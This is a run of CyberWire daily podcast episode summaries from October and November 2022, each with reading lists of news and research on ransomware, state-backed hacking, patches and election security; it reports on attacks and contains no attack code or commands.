Hack the Real Box: APT41’s New Subgroup Earth Longzhi (Trend Micro)

New hacking group uses custom 'Symatic' Cobalt Strike loaders (BleepingComputer)

They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming (Mandiant)

APT29 Exploited a Windows Feature to Compromise European Diplomatic Entity Network (The Hacker News)

CAUTION‼️ russian hackers are sending emails with malicious links from the SSSCIP (State Service of Special Communications and Information Protection of Ukraine)

Russian hackers send out emails under the name of Ukraine's State Service of Special Communications and Information Protection (Yahoo)

Research Report | The State of Email Security 2022 (Tessian)

DevOps Tools & Infrastructure Under Attack (Wallarm)

A look back at midterm cybersecurity. Communications security lessons learned in Ukraine. Known Exploited Vulnerabilities and Patch Tuesday. Off-boarding deserves some attention. Nov 09, 2022

US midterm elections proceed without cyber disruption. Communications security lessons learned. CISA publishes new entries to its Known Exploited Vulnerabilities Catalog. Patch Tuesday notes. Carole Theriault examines cross border money laundering. The FBI’s Bryan Vorndran offers guidance on how companies should think about their exposure in china. And a recent study finds reasons to be concerned about off-boarding.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/216

Selected reading.

Taking a look at election security on US midterm Election Day. (CyberWire)

Communications Security: Lessons Learned From Ukraine (BlackBerry)

CISA Adds Seven Known Exploited Vulnerabilities to Catalog (CISA)

Microsoft November 2022 Patch Tuesday (SANS Institute)

November Patch Tuesday Updates | 2022 (Syxsense Inc)

Microsoft Fixes Six Actively Exploited Flaws (Decipher)

Microsoft fixes ProxyNotShell Exchange zero-days exploited in attacks (BleepingComputer)

Microsoft Scrambles to Thwart New Zero-Day Attacks (SecurityWeek)

Infrastructure access and security. (CyberWire)

Cybersecurity on US Election Day. OPERA1ER threat activity. Insider threats. Hacktivist auxiliaries: influence operators in the hybrid war. And Mr. Hushpuppi is back in the news. Nov 08, 2022

Cybersecurity on US Election Day. Details on the OPERA1ER threat activity. Seasonal and secular trends in Insider threats. Hacktivist auxiliaries: influence operators in the hybrid war. Ben Yelin reviews election security and misinformation. Ann Johnson from Afternoon Cyber Tea speaks with Dr. Ryan Louie about the growing issue of mental illness among cybersecurity professionals. And, hey everybody, Mr. Hushpuppi is back in the news (and back in the slammer, the hoosgow, the big house…you get the picture…a sabbatical at Club Fed.)

Disclaimer: The content and views expressed do not constitute medical advice and are not a substitute for professional medical advice, diagnosis, or treatment. If you need help, please contact your medical provider.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/215

Selected reading.

Your Election Day cyber guide (Washington Post)

Putin-linked businessman admits to US election meddling (AP NEWS)

OPERA1OR: Playing god without permission (Group-IB)

DTEX i3 Team Insider Risk Stats for 2022 (DTEX Systems Inc)

Killnet targets Eastern Bloc government sites, but fails to keep them offline (The Record by Recorded Future)

Ukrainian hacktivists claim to leak trove of documents from Russia’s central bank (The Record by Recorded Future)

Notorious Nigerian influencer ‘Billionaire Gucci Master’ sentenced to 11 years in jail in the U.S. for fraud (Forbes)

Hushpuppi: Notorious Nigerian fraudster jailed for 11 years in US (BBC)

Election security on the eve of the US midterms. US FBI rates the hacktivist threat. Microsoft says China uses disclosure laws to develop zero-days. Remember SIlk Road? The Feds do. Nov 07, 2022

Election security on the eve of the US midterms. US FBI rates hacktivist contributions to Russia's war as unimportant. Microsoft accuses China of using vulnerability disclosure to develop zero-days. Andrea Little Limbago from Interos addresses accountability for breaches. Our guest is Michelle Amante from the Partnership for Public Service on their Cybersecurity Talent Initiative. And, finally, remember SIlk Road? The Feds do.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/214

Selected reading.

Hacktivists Use of DDoS Activity Causes Minor Impacts (FBI)

The government says it won’t flag election disinformation on Twitter and other social platforms (Washington Post)

What to Expect When You are Expecting an Election (CISA)

Hacktivists Use of DDoS Activity Causes Minor Impacts (FBI)

Nation-state cyberattacks become more brazen as authoritarian leaders ramp up aggression (Microsoft On the Issues)

U.S. Attorney Announces Historic $3.36 Billion Cryptocurrency Seizure And Conviction In Connection With Silk Road Dark Web Fraud (U.S. Attorney’s Office for the Southern District of New York)

Gary Brickhouse: Riding the wave of growth. [CISO] [Career Notes] Nov 06, 2022

Gary Brickhouse, CISO from GuidePoint Security, sits down to share his story, looking back over the last 25 years of his career working for Fortune 100 companies, including Disney. He shares that every role he has had, he’s had to grow into and how each one was a pivotal point in his technical career. Gary ended up transitioning to a different organization and says how it was really compliance that was the transitional sort of moment for him as he grew into different roles. He says, “What I found was sort of just, riding the wave of growth and opportunity and trying to take advantage of it along the way." He shares some advice for new people entering the industry, saying that he wants to help shatter the myth that you have to be technical to get into this field. We thank Gary for sharing his story.

Over-the-air 0-day vulnerabilities. [Research Saturday] Nov 05, 2022

Roya Gordon from Nozomi Networks sits down with Dave to discuss their work "UWB Real Time Locating Systems: How Secure Radio Communications May Fail in Practice." Ultra-wideband (UWB) is a rapidly-growing radio technology that, according to the UWB Alliance, is forecasted to drive sales volumes exceeding one billion devices annually by 2025.

In an effort to strengthen the security of devices utilizing UWB, Nozomi Networks Labs conducted a security assessment of two popular UWB RTLS solutions available on the market. Their research reveals 0-day vulnerabilities and other weaknesses that, if exploited, could allow an attacker to gain full access to all sensitive location data exchanged over-the-air.

The research can be found here:

UWB Real Time Locating Systems: How Secure Radio Communications May Fail in Practice

Flight-planning and rail services disrupted in separate incidents. BEC gang impersonates law firms. Effects of the hybrid war on action in cyberspace. And a farewell to Vitali Kremez, gone far too soon. Nov 04, 2022

Flight-planning services are affected by cyberattack, as are Danish rail service. A BEC gang impersonates international law firms. Effects of the hybrid war on action in cyberspace. Deepen Desai from Zscaler examines the evolution of the X-FILES Stealer. CyberWire Space Correspondent Maria Varmazis has an analysis of the Starlink situation in Ukraine. And a sad, final farewell to Vitali Kremez, gone far too soon.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/213

Selected reading.

Boeing subsidiary Jeppesen's services impacted by cyber incident (Reuters)

BREAKING: Boeing's Jeppesen Subsidiary Hit With Potential Ransomware Attack (Live and Let's Fly)

Danish train standstill on Saturday caused by cyber attack (Reuters)

Cyber incident at Boeing subsidiary causes flight planning disruptions (The Record by Recorded Future)

Crimson Kingsnake: BEC Group Impersonates International Law Firms in… (Abnormal Security)

New Crimson Kingsnake gang impersonates law firms in BEC attacks (BleepingComputer)

Ukraine war, geopolitics fuelling cybersecurity attacks -EU agency (Reuters)

Microsoft Extends Aid for Ukraine's Wartime Tech Innovation (SecurityWeek)

Evaluating the International Support to Ukrainian Cyber Defense (Carnegie Endowment for International Peace)

Cyber community mourns renowned researcher Vitali Kremez (The Record by Recorded Future)

Remembering Vitali Kremez, Threat Intelligence Researcher (Bank Info Security)

“Static expressway” tactics in credential harvesting. Emotet is back. Black Basta linked to Fin7. RomCom hits Ukrainian targets and warms up against the Anglo-Saxons. Cyber cooperation? Nov 03, 2022

Leveraging Microsoft Dynamics 365 Customer Voice for credential harvesting. Emotet is back. Black Basta ransomware linked to Fin7. A Russophone gang increases activity against Ukrainian targets. Betsy Carmelite from Booz Allen Hamilton on adversary-informed defense. Our guest is Tom Gorup of Alert Logic with a view on cybersecurity from a combat veteran. And Russia regrets that old US lack of cooperation in cyberspace–things would be so much better if the Anglo-Saxons didn’t think cyberspace was the property of the East India Company. Or something like that.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/212

Selected reading.

Abusing Microsoft Customer Voice to Send Phishing Links (Avanan)

Emotet botnet starts blasting malware again after 5 month break (BleepingComputer)

Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor (SentinelOne)

RomCom Threat Actor Abuses KeePass and SolarWinds to Target Ukraine and Potentially the United Kingdom (BlackBerry)

Russia cyber director warns no U.S. cooperation risks "mutual destruction" (Newsweek)

OpenSSL indeed patched. CISA is confident of election security. Killnet attempted DDoS against the US Treasury. XDR data reveals threat trends. BEC and gift cards. And that’s one sweet ride. Nov 02, 2022

OpenSSL patches two vulnerabilities. CISA and election security. Killnet attempted DDoS against the US Treasury. XDR data reveals threat trends. Business email compromise and gift cards. Tim Starks from the Washington Posts’ Cybersecurity 202 has the latest on election security. A visit to the CyberWire’s Women in Cyber Security event. And consequences for Raccoon Stealer from the war in Ukraine.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/211

Selected reading.

OpenSSL patched today. (CyberWire)

OpenSSL Releases Security Update (CISA)

OpenSSL releases fixes for two ‘high’ severity vulnerabilities (The Record by Recorded Future)

OpenSSL patches are out – CRITICAL bug downgraded to HIGH, but patch anyway! (Naked Security)

Threat Advisory: High Severity OpenSSL Vulnerabilities (Cisco Talos Blog)

OpenSSL Vulnerability Patch Released (Sectigo® Official)

Clearing the Fog Over the New OpenSSL Vulnerabilities (Rezilion)

OpenSSL vulnerability CVE-2022-3602 (Remote Code Execution) and CVE-2022-3786 (Denial of Service) Check Point Research Update (Check Point Software)

Undisclosed OpenSSL vulnerability: Free scripts for target scoping (Lightspin)

Discussions of CISA’s part in elections and the JCDC. (CyberWire)

U.S. Treasury thwarted attack by Russian hacker group last month-official (Reuters)

XDR data reveals threat trends. (CyberWire)

What happens to a gift card given to a scammer? (CyberWire)

How Russia’s war in Ukraine helped the FBI crack one of the biggest cybercrime cases in years (MarketWatch)

OpenSSL patched today. The risk of misconfiguration. Cyberespionage (and the risk of mixing the personal with the official). Assistance for Ukraine's cyber defense., And a quick look at DNS threats. Nov 01, 2022

OpenSSL is patched today. The misconfiguration risk to US government networks' security and compliance. Hacking Ms Truss's phone. Assistance for Ukraine's cyber defense. Joe Carrigan looks at the latest round of apps pulled from the Google Play Store. Our guest is Matias Madou of Secure Code Warrior on why cultivating a positive culture among security and developer teams continues to fall short. And a quick look at DNS threats.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/210

Selected reading.

Effectively Preparing for the OpenSSL 3.x Vulnerability (Akamai) O

How The OpenSSL 3 Vulnerability Will Really Affect Your Environment (Nucleus Security)

New Critical Flaw in OpenSSL: How to Know if You're at Risk (Rezilion)

Experts warn of critical security vulnerability discovered in OpenSSL (Application Security Blog)

The impact of exploitable misconfigurations on network security within US Federal organizations (Titania)

Liz Truss's personal phone hacked by Putin's spies (Mail Online) O

Truss phone was hacked by suspected Putin agents when she was foreign minister, the Daily Mail reports (Reuters)

Liz Truss phone hack claim prompts calls for investigation (BBC News)

Russian spies hacked Truss's personal phone (Computing)

Government urged to investigate report Liz Truss’s phone was hacked (the Guardian)

Ministers creating ‘wild west’ conditions with use of personal phones (the Guardian)

Suella Braverman admits sending official documents to personal email six times (The Telegraph)

Ukraine War: UK reveals £6m package for cyber defence (BBC News)

DNS Threat Report — Q3 2022 (Akamai)

Copper smelter hit with malware. Notes from the hybrid war. Disinformation, not direct manipulation of results, the principal threat to US elections. Ransomware in Australia’s ForceNet. Threat trends. Oct 31, 2022

Leading European metals producer is hit with malware. Cooperative defense in cyberspace. A Ukrainian ally describes its exposure to Russian cyberattacks. Former UK Prime Minister Truss's phone may have been compromised. CISA sees a complex threat environment, but no specific threat to US elections. The Australian Defence network sustains ransomware attack. The three finalists in the DataTribe Challenge share insights on the competition. Rick Howard previews the new season of CSO Perspectives. And a look at threat trends.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/209

Selected reading.

Aurubis says it was hit in wider cyberattack on metals industry (Reuters)

Copper Giant Aurubis Shuts Down Systems Due to Cyberattack (SecurityWeek)

Inside a US military cyber team’s defence of Ukraine (BBC News)

Ukraine's cyber power shows value of public-private partnership (Nikkei Asia)

Latvian President: Only the West’s Weakness Can Provoke Russia (Foreign Policy)

Latvia’s cyberspace faces new challenges amid war in Ukraine (The Record by Recorded Future)

Worries build about winter cyber threats in Ukraine (POLITICO)

Liz Truss's personal phone hacked by Putin's spies (Mail Online)

Truss phone was hacked by suspected Putin agents when she was foreign minister, the Daily Mail reports (Reuters)

Liz Truss phone hack claim prompts calls for investigation (BBC News)

Russian spies hacked Truss's personal phone (Computing)

Government urged to investigate report Liz Truss’s phone was hacked (the Guardian)

Ministers creating ‘wild west’ conditions with use of personal phones (the Guardian)

'Complex threat environment' ahead of midterm elections, top cybersecurity official says (Reuters)

CISA chief sees no "specific or credible threats" to election infrastructure (CBS News)

For cyber experts, disinformation overshadows cyberthreats in midterms (Washington Post)

Australian Defence Department caught up in ransomware attack (ABC)

Cyber-attack on Australian defence contractor may have exposed private communications between ADF members (the Guardian)

Cyber Threat Reports (Deep Instinct)

Deep Instinct releases its 2022 Interim Cyber Threat Study. (CyberWire)

Jenny Brinkley: A cybersecurity rollercoaster. [Security] [Career Notes] Oct 30, 2022

Jenny Brinkley, Director of AWS Security at Amazon Web Services (AWS), sits down to share her empowering story working through the ranks, and even co-founding her own company. While she did not have a typical upbringing in the industry, she credits her parents for ending up where she is now, as they told her that she could do anything and she decided as she was growing up that she could. She had the opportunity to co-found a small startup before selling it to AWS. She says that working in her position is like a rollercoaster, as no one thing is like the other, saying her highs are high and her lows are low. Being a woman in cybersecurity, she is working to empower more women in the field, Jenny says, "I think that we're living in such an interesting time where empathy, kindness, compassion, honesty, partnership in the security space, I mean, heck for any industry, but really for security and cyber security roles today, it's, it's the life blood and to be underestimated, especially as a female or because, you know, my background doesn't follow a cookie cutter pattern of what individuals think of when they think of individuals in security roles." We thank Jenny for sharing her story.

Bugs and working from home. [Research Saturday] Oct 29, 2022

Fede Kirschbaum from Faraday Security sits down with Dave to discuss their research on "A vulnerability in Realtek's SDK for eCos OS: pwning thousands of routers." The team at Faraday found a vulnerability that made it to DEFCON 30, labeling it high severity. With more and more people working from home for their companies, the research team went looking for where there may be vulnerabilities as employees are working from home.

The research states that the team was "seeking and reporting security vulnerabilities in IoT devices, which led to the finding of an exploitable bug in a consumer-grade router popular in Argentina." They also stated in the research that it was escalating quickly and shares about how protecting home networks is important while working remotely.

The research can be found here:

A vulnerability in Realtek´s SDK for eCos OS: pwning thousands of routers

Another DDoS attack against NATO governments. The US 2022 National Defense Strategy is out. Notes on ICS security. Oct 28, 2022

Cyberattacks against Poland’s and Slovakia’s parliaments. The US 2022 National Defense Strategy is out. Insights from SecurityWeek’s ICS Cyber Security Conference. The importance of zero-trust in industrial environments. Malek Ben Salem from Accenture on machine language security and safety. Our guest is Nick Schneider of Arctic Wolf to discuss why he believes 2023 will see a resurgence of ransomware. And CISA issues four more ICS Advisories.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/208

Selected reading.

Computer networks of parliaments in Poland and Slovakia paralyzed by cyberattacks (Euro Weekly News)

Slovak, Polish Parliaments Hit By Cyber Attacks (Barron's)

Slovak parliament suspends voting due to suspected cyberattack (Reuters)

"Also from Russia" - cyber attack on parliaments in Poland and Slovakia - Today Times Live (Today Times Live)

2022 National Defense Strategy (US Department of Defense)

2022 NDS Fact Sheet | Integrated Deterrence (US Department of Defense)

Discussing cyberattacks vs system failures. (CyberWire)

Zero-trust in ICS environments. (CyberWire)

SANS 2022 Survey: The State of OT/ICS Cybersecurity in 2022 and Beyond | Nozomi Networks (Nozomi Networks)

CISA Releases Four Industrial Control Systems Advisories (CISA)

The Malware Mash! [Bonus] Oct 28, 2022

Enjoy this CyberWire classic.

They did the Mash...the did the Malware Mash...

CISA releases voluntary CPGs. Trojans and scanners. Cyber venture investing, and some insights into corporate culture. "Opportunistic" cyberops in a hybrid war. Oct 27, 2022

CISA releases cross-sector cybersecurity performance goals. Trojans are spreading through scanners. Cyber seed rounds are an exception to a general downtrend in venture investment. Whistleblowing and corporate culture. Storing enterprise secrets. Robert M. Lee from Dragos explains the TSA Pipeline Security Directive. Our guests are Jenny Brinkley from Amazon AWS and Lisa Plaggemier from the National Cybersecurity Alliance with a collaborative educational project. Cyberattacks seen as opportunistic and disconnected from strategy.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/207

Selected reading.

Cross-Sector Cybersecurity Performance Goals (CISA)

CISA unveils voluntary cybersecurity performance goals (Federal News Network)

Sending Trojans via Scanners (Avanan)

DataTribe Insights - Q2 2022: Economic Storm Makes Landfall (DataTribe)

Ukraine: Russian cyber attacks aimless and opportunistic (SearchSecurity)

Amid widespread unrest, Sudan shutters its Internet. A new PRC influence campaign targets US elections. Software supply chain security. And cybercrime in wartime. Oct 26, 2022

Sudan closes its Internet as the country sees protests on the first anniversary of a coup. A Chinese influence campaign targets US elections. A software supply chain security study, and a look at vulnerability scanning tools. Documenting cyber war crimes in Ukraine. CISA issues eight ICS Advisories. Andrea Little Limbago from Interos on the effects of water scarcity on data centers. And if you’ll indulge us, we’ve got some pretty exciting CyberWire news.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/206

Selected reading.

Internet is shut down in Sudan on anniversary of military coup (The Record by Recorded Future)

Pro-PRC DRAGONBRIDGE Influence Campaign Leverages New TTPs to Aggressively Target U.S. Interests, Including Midterm Elections (Mandiant)

Rezilion Vulnerability Scanner Benchmark Report Finds Top Scanners Only 73% Accurate (PR Newswire)

Four in Five Software Supply Chains Exposed to Cyberattack in the Last 12 Months (BlackBerry)

Ukraine Documenting Russian Hacks, Eyeing International Charges (Bloomberg)

CISA Releases Eight Industrial Control Systems Advisories (CISA)

US Department of Justice unseals three indictments in PRC spying cases. CERT-UA warns of Cuba ransomware phishing. Varonis discovers Windows vulnerabilities. CISA expands KEV Catalog. Oct 25, 2022

US Department of Justice unseals three indictments in PRC spying cases. CERT-UA warns of Cuba ransomware group phishing campaign. Varonis discovers two Windows vulnerabilities. Mr Security Answer Person John Pescatore on security through obscurity. Ben Yelin on the DOJ’s spying cases against China. CISA expands its Known Exploited Vulnerabilities Catalog with six new entries.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/205

Selected reading.

Two Arrested and 13 Charged in Three Separate Cases for Alleged Participation in Malign Schemes in the United States on Behalf of the Government of the People’s Republic of China (US Department of Justice)

U.S. Justice Department Fires Warning Shot at Chinese Spies (Foreign Policy)

Chinese spies charged with trying to thwart Huawei investigation (Quartz)

DOJ Charges 13 Over Chinese Interference In US Affairs (Law360)

U.S. Says Chinese Tried to Obstruct Huawei Prosecution (Wall Street Journal)

U.S. charges Chinese nationals with schemes to steal info, punish critics and recruit spies (CBS News)

Cuba ransomware affiliate targets Ukrainian govt agencies (BleepingComputer)

Unattributed RomCom Threat Actor Spoofing Popular Apps Now Hits Ukrainian Militaries (BlackBerry)

The Logging Dead: Two Event Log Vulnerabilities Haunting Windows (Varonis)

CISA Adds Six Known Exploited Vulnerabilities to Catalog (CISA)

US unseals cases against PRC intelligence officers. Daixin ransomware is an active threat. FBI warns of Iranian threat group. Iran’s nuclear agency discloses hack. Hybrid war and threats to infrastructure. Oct 24, 2022

Breaking: US unseals three cases against Chinese intelligence officers. CISA says Daixin Team ransomware is an active threat. The FBI warns of Iranian threat group's activity. Meanwhile the Iranian nuclear agency says its email was hacked. Norway is concerned about threats to oil and gas infrastructure. A drop in ransomware correlates with Russia's hybrid war. Ann Johnson from Afternoon Cyber Tea speaks with AJ Yawn from ByteChek about breaking into the cybersecurity industry. Josh Ray from Accenture describes threats to the satellite industry. And cyber offense may be proving harder than thought.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/204

Selected reading.

CISA Alert AA22-294A – #StopRansomware: Daixin Team. (CyberWire)

#StopRansomware: Daixin Team (CISA)

CISA Warns of Daixin Team Hackers Targeting Health Organizations With Ransomware (The Hacker News)

Iranian Cyber Group Emennet Pasargad Conducting Hack-and-Leak Operations Using False-Flag Personas (FBI)

FBI warns Iranian hackers active ahead of the U.S. midterms (NBC News)

FBI Warns of Attacks From Iranian Threat Group Emennet Pasargad (Decipher)

Iran Hackers Behind Attempt on US Election Are Still Active (Gov Info Security)

FBI warns of ‘hack-and-leak’ operations from group based in Iran (The Record by Recorded Future)

Iran's Atomic Energy Agency Says Its E-Mail Server Was Hacked (RadioFreeEurope/RadioLiberty)

Iran says ‘specific foreign country’ behind hacktivist leak of atomic energy emails (The Record by Recorded Future)

Iran’s Top Nuclear Agency Says Its Email Servers Were Hacked (Bloomberg)

Ukraine Could Still Face Cyberattacks, Experts Say (CNET)

Fears over Russian threat to Norway's energy infrastructure (AP NEWS)

Norway PM: Russia poses ‘real and serious’ cyber threat to oil and gas industry (The Record by Recorded Future)

Ukraine war cuts ransomware as Kremlin co-opts hackers (The Telegraph)

Q&A: Kenneth Geers on the cyber war between Ukraine and Russia (The Record by Recorded Future)

CISA Alert AA22-294A – #StopRansomware: Daixin Team. [CISA Cybersecurity Alerts] Oct 24, 2022

FBI, CISA, and Department of Health and Human Services are releasing this joint advisory to provide information on the Daixin Team, a cybercrime group that is actively targeting U.S. businesses, predominantly in the Healthcare and Public Health Sector.

AA22-294A Alert, Technical Details, and Mitigations

Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.

Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.

Ongoing Threat Alerts and Sector alerts are produced by the Health Sector Cybersecurity Coordination Center (HC3) and can be found at hhs.gov/HC3

For additional best practices for Healthcare cybersecurity issues see the HHS 405(d) Aligning Health Care Industry Security Approaches at 405d.hhs.gov

CISA offers several no-cost scanning and testing services to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. See www.cisa.gov/cyber-hygiene-services

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

Megan Doherty: Conquer barriers in the workforce. [Technical Specialist] [Career Notes] Oct 23, 2022

Megan Doherty, a Technical Specialist from Microsoft Canada sits down to share her story of overcoming barriers in the workforce to get to where she is today in her career. Megan started out being a mechanical engineer before making the switch to do something with more creativity and problem solving. She shares about her passion of working with a group Microsoft created called "DigiGirlz." As well as just being able to work with her team who she says helps her face the world of adversity in her career. Megan said "There's so many barriers, just even mentally that we put on ourselves when it comes to looking for a career change or even thinking of cybersecurity as your next career path." She hopes that she leaves a legacy of kindness and compassion behind especially in the industry she is works in. We thank Megan for sharing her story with us.

New tools target governments in Middle East? [Research Saturday] Oct 22, 2022

Dick O'Brien from Symantec's Threat Hunter team sits down with Dave to discuss their work on "Witchetty - Group Uses Updated Toolset in Attacks on Governments in Middle East." Their research has found that the group known as Witchetty aka LookingFrog, has been progressively updating its toolset, including the new tool, backdoor Trojan (Backdoor.Stegmap) to launch malware attacks on targets in the Middle East and Africa.

The research states "The attackers exploited the ProxyShell and ProxyLogon vulnerabilities to install web shells on public-facing servers before stealing credentials, moving laterally across networks, and installing malware on other computers. The researchers describe more on the new tool being used and why this new group is a threat.

The research can be found here:

Witchetty: Group Uses Updated Toolset in Attacks on Governments in Middle East

Blackbyte's new exfiltration tool. Hijacking student accounts for BEC. Zhora calls Russia's cyber campaigns a failure. OldGremlin ransomware is an outlier. Oct 21, 2022

Blackbyte's new exfiltration tool. Hijacking student accounts for BEC. Zhora calls Russia's cyber campaigns a failure. Caleb Barlow explores new thinking for incident response. Our guest is Jon Hencinski of Expel, tracking the latest threat trends. OldGremlin ransomware is an outlier.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/203

Selected reading.

Exbyte: BlackByte Ransomware Attackers Deploy New Exfiltration Tool (Symantec)

Hijacking Student Accounts to Launch BEC-Style Attacks (Avanan)

This sneaky kind of cybercrime rules them all (Washington Post)

Russia Failing to Reach Cyber War Goals, Ukrainian Official Says (Meritalk)

EU supports cybersecurity in Ukraine with over €10 million - EU NEIGHBOURS east (EU NEIGHBOURS east)

Gremlins’ prey, secrets, and dirty tricks: the ransomware gang OldGremlin set new records (Group-IB)

OldGremlin hackers use Linux ransomware to attack Russian orgs (BleepingComputer)

OldGremlin, which targets Russia, debuts new Linux ransomware (Computing) It is one of the few ransomware groups in the world that prefer to target Russian organisations, but this may change experts advise

More Russian Organizations Feeling Ransomware Pain (Bank Info Security)

Notes and lessons on the hybrid war. Update on Zimbra exploitation. Microsoft fixes misconfigured storage. The state of the cyber workforce. Trends in phishing and ransomware. Oct 20, 2022

DDoS as misdirection. NSA shares lessons learned from cyber operations observed in Russia's war against Ukraine. Advice from CISA on Zimbra.. A misconfigured Microsoft storage endpoint has been secured. Notes from a study on the Cybersecurity Workforce . The cost to businesses of phishing. Betsy Carmelite from Booz Allen Hamilton on managing mental health in the cyber workforce. Our guest is Ismael Valenzuela of Blackberry with insights on "The Cyber Insurance Gap". And updates to the ransomware leaderboard.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/202

Selected reading.

Bulgarian cyberattack: Sabotage as a cover for spying? (Deutsche Welle)

Bulgarian websites impacted by Killnet DDoS attack (SC Media)

Lessons From Ukraine: NSA Cyber Chief Lauds Industry Intel (Meritalk)

NSA Cybersecurity Director's Six Takeaways From the War in Ukraine (Infosecurity Magazine)

NSA cyber chief says Ukraine war is compelling more intelligence sharing with industry (CyberScoop)

Investigation Regarding Misconfigured Microsoft Storage Location (Microsoft Security Response Center)

2019 Cybersecurity Workforce Study ((ISC)²)

The Business Cost of Phishing (Ironscales)

Leading Ransomware Variants Q3 2022 (Intel471)

Dispatches from the hybrid war, as auxiliaries on both sides skirmish in cyberspace. An Azure vulnerability patched. Trends in ransomware. And Social Security phishbait. Oct 19, 2022

Killnet explains its actions against Bulgaria's government. The National Republican Army claims successful attacks on Russian companies. The Director of Germany's BSI is out. A vulnerability in Azure, disclosed and patched. Trends in ransomware. Carole Theriault has a fresh look at the ransomware question - to pay or not to pay? Tim Eades from Cyber Mentor Fund considers cyber insurance for the small and medium sized businesses. Social Security phishing.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/201

Selected reading.

Cyberattack disrupts Bulgarian government websites over ‘betrayal to Russia’ (The Record by Recorded Future)

Russians Against Putin: NRA Claims Massive Hack of Russian Government Contractors’ Computers - Kyiv Post - Ukraine's Global Voice (Kyiv Post)

Germany fires cybersecurity chief after reports of possible Russia ties (Reuters)

German Cybersecurity Chief Sacked Over Alleged Russia Ties (SecurityWeek)

German cyber chief suspended following allegation he associated with Russian intelligence (The Record by Recorded Future)

FabriXss (CVE-2022-35829): How We Managed to Abuse a Custom Role User Using CSTI and Stored XSS in Azure Fabric Explorer (Orca Security)

Ransomware In Q3 2022 (Digital Shadows)

Fresh Phish: A New Social Security Phishing Scam Preys Upon Our Biggest Worries (INKY)

Mobilizing DDoS-as-a-service. Interpol takes down Black Axe gang members. Trends in phishing. Spyder Loader active in Hong Kong. Europol announces arrests in keyless car hacking case. Oct 18, 2022

Mobilizing DDoS-as-a-service. Interpol takes down the Black Axe gang members. A look at phishing trends. Spyder Loader is active in Hong Kong. Joe Carrigan looks at Google’s launch of passwordless authentication. Our guest is Dr. Eman El-Sheikh from University of West Florida's Center for Cybersecurity on NSA-funded National Cybersecurity Workforce Development Programs. And Europol announces arrests in a case of keyless car hacking.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/200

Selected reading.

Project DDOSIA Russia's answer to disBalancer (Radwaare)

Russian DDOSIA Project Pays Volunteers to Participate in DDOS Attacks on Western Companies (Gridinsoft Blogs)

International crackdown on West-African financial crime rings (Interpol)

Giant online scamming syndicate 'Black Axe' destroyed in Interpol-led operation (teiss)

INTERPOL-led Operation Takes Down 'Black Axe' Cyber Crime Organization (The Hacker News)

Operation Jackal: Interpol arrests Black Axe fraud suspects (Register)

When the Black Axe falls: cybercrime suspects detained in global bust (Cybernews)

International Police Action Blunts Black Axe Criminal Group - HS Today (Hstoday)

Q3 2022 Cofense Phishing Intelligence Trends Review (Cofense)

Spyder Loader: Malware Seen in Recent Campaign Targeting Organizations in Hong Kong (Symantec)

Operation CuckooBees: Cybereason Uncovers Massive Chinese Intellectual Property Theft Operation (Cybereason)

31 arrested for stealing cars by hacking keyless tech | Europol (Europol)

European gang that sold car hacking tools to thieves arrested (The Record by Recorded Future)

Tata Power sustains cyberattack. Influence operations and battlespace prep. Ransom Cartel looks a lot like REvil. Notes from Russia’s hybrid war. Oct 17, 2022

There’s been a Cyberattack against Tata Power. The FBI warns US state political parties of Chinese scanning. Russian influence ops play defense; China’s are on the offense. Ransom Cartel and a possible connection to REvil. "Prestige" ransomware is sighted in attacks on Polish and Ukrainian targets. Distributed denial-of-service attacks interfere with Bulgarian websites. Grayson Milbourne of OpenText Security Solutions on SBOMS. Our own Rick Howard checks in with Bryan Willett of Lexmark on implementation of Zero Trust. And Mr. Musk tweets his intention to continue to subsidize Starlink for Ukraine (probably).

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/199

Selected reading.

Hackers Attack Tata Power IT Systems: All You Need To Know (IndiaTimes)

Chinese hackers are scanning state political party headquarters, FBI says (Washington Post)

The Defender's Advantage Cyber Snapshot Issue 2 — More Insights From the Frontlines (Mandiant)

Ransom Cartel Ransomware: A Possible Connection With REvil (Unit 42)

New “Prestige” ransomware impacts organizations in Ukraine and Poland (Microsoft Security Threat Intelligence)

